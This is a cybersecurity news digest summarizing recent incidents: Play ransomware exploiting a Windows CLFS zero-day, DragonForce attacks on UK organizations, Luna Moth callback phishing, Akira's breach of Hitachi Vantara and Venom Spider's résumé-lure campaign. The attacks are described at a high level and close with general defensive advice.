Recently patched Windows zero-day vulnerability exploited by Play ransomware to breach U.S. organization
Threat actors linked to the Play ransomware group exploited a recently patched Windows vulnerability (CVE-2025-29824) as a zero-day in an attack on a U.S. organization, leveraging privilege escalation through the CLFS driver.
Researchers report the attackers likely gained entry via a Cisco ASA appliance, then moved laterally within the network using tools like Grixba, a custom infostealer, and disguised payloads posing as Palo Alto Networks software. They collected Active Directory data, escalated privileges with batch files and attempted to cover their tracks, but did not deploy ransomware.
The attack took place before Microsoft disclosed and patched the Windows privilege escalation zero-day vulnerability (CVE-2025-29824) in the Common Log File System Driver (clfs.sys) on April 8, 2025.
U.K.’s Legal Aid Agency and major retailers are recent victims of DragonForce ransomware group
The U.K.’s Legal Aid Agency (LAA), which manages billions in legal funding, warned law firms of a cyber incident that may have exposed financial information.
Around 2,000 legal service providers working under LAA contracts could be affected, though the agency has not confirmed any data access so far. In its letter to providers, the LAA acknowledged the risk to payment data and emphasized that it is investigating the issue and taking mitigation steps.
In addition to LAA, the U.K.’s National Crime Agency and National Cyber Security Centre are investigating attacks against Harrod’s (2024 revenue of $1.34 billion); Marks and Spencer ($16.25 billion revenue in 2024); and Co-op ($14.3 billion revenue in 2024) — all claimed by the DragonForce ransomware group. The NCSC has urged U.K. businesses to treat these incidents as a serious warning and bolster their cybersecurity defenses. Law enforcement has not released an official advisory related to these attacks, but as M&S and Co-op are both believed to have started with social engineering attacks.
U.S. firms breached by Luna Moth extortion attackers posing as IT help desks
The Luna Moth group, also known as Silent Ransom Group, has intensified its callback phishing attacks on U.S. legal and financial institutions.
According to researchers, the group's main objective is data theft and extortion, not ransomware deployment. These attacks typically begin with phishing emails urging recipients to call fake IT helpdesk numbers, where operators impersonate support staff. Victims are then tricked into installing legitimate remote monitoring tools like AnyDesk, Atera or Zoho Assist. Once installed, attackers gain direct access to systems and exfiltrate sensitive data using tools like WinSCP or Rclone. Luna Moth then demands ransoms between one and eight million dollars to prevent public leaks.
The group has registered over 37 fake helpdesk domains using typosquatting tactics. Researchers advise blocking known malicious domains and restricting unused RMM tools within corporate environments.
Akira ransomware group hits Hitachi Vantara, forcing them to take down systems
Hitachi Vantara, the data storage, infrastructure and hybrid cloud management subsidiary of Hitachi, Ltd., took several servers offline to contain a ransomware attack carried out by the Akira group.
The company, which serves major global brands and government agencies with cloud, infrastructure, and ransomware recovery solutions, confirmed the breach and activated its incident response protocols. External cybersecurity experts were engaged to investigate the impact, while systems were shut down to prevent further spread.
Although Hitachi did not officially name the threat actor, researchers learned Akira was behind the intrusion and had stolen data and dropped ransom notes on compromised machines. While cloud services remain operational, internal systems, support functions, and Hitachi Vantara Manufacturing have been disrupted. Sources indicate that projects tied to government entities were also affected. Akira, active since 2023, has breached over 250 organizations and extorted around $42 million in ransoms by April 2024. And, from January to April 2025, Akira has claimed over 270 victims.
Hiring managers are targets of 'Venom Spider' spear-fishing campaign
Researchers uncovered a spear-phishing campaign by the threat actor "Venom Spider" that targets HR staff by posing as job seekers.
The attackers send emails with fake résumés, tricking hiring managers into downloading malicious zip files that contain a Windows shortcut file (.LNK) used to initiate the attack. Once opened, the file secretly launches scripts and installs a backdoor called "More_eggs," which collects system information and connects to a command-and-control server. Venom Spider’s techniques include polymorphic files, time-delayed execution and the use of legitimate Windows utilities to evade detection. This campaign has been ongoing since at least October 2023 and follows earlier activity traced back to 2018.
Researchers warn that HR staff are especially vulnerable due to the nature of their work, which involves regularly opening email attachments. Employees are advised to inspect suspicious file types like .LNK, ISO or VBS before opening them, even if they appear to be legitimate application documents.
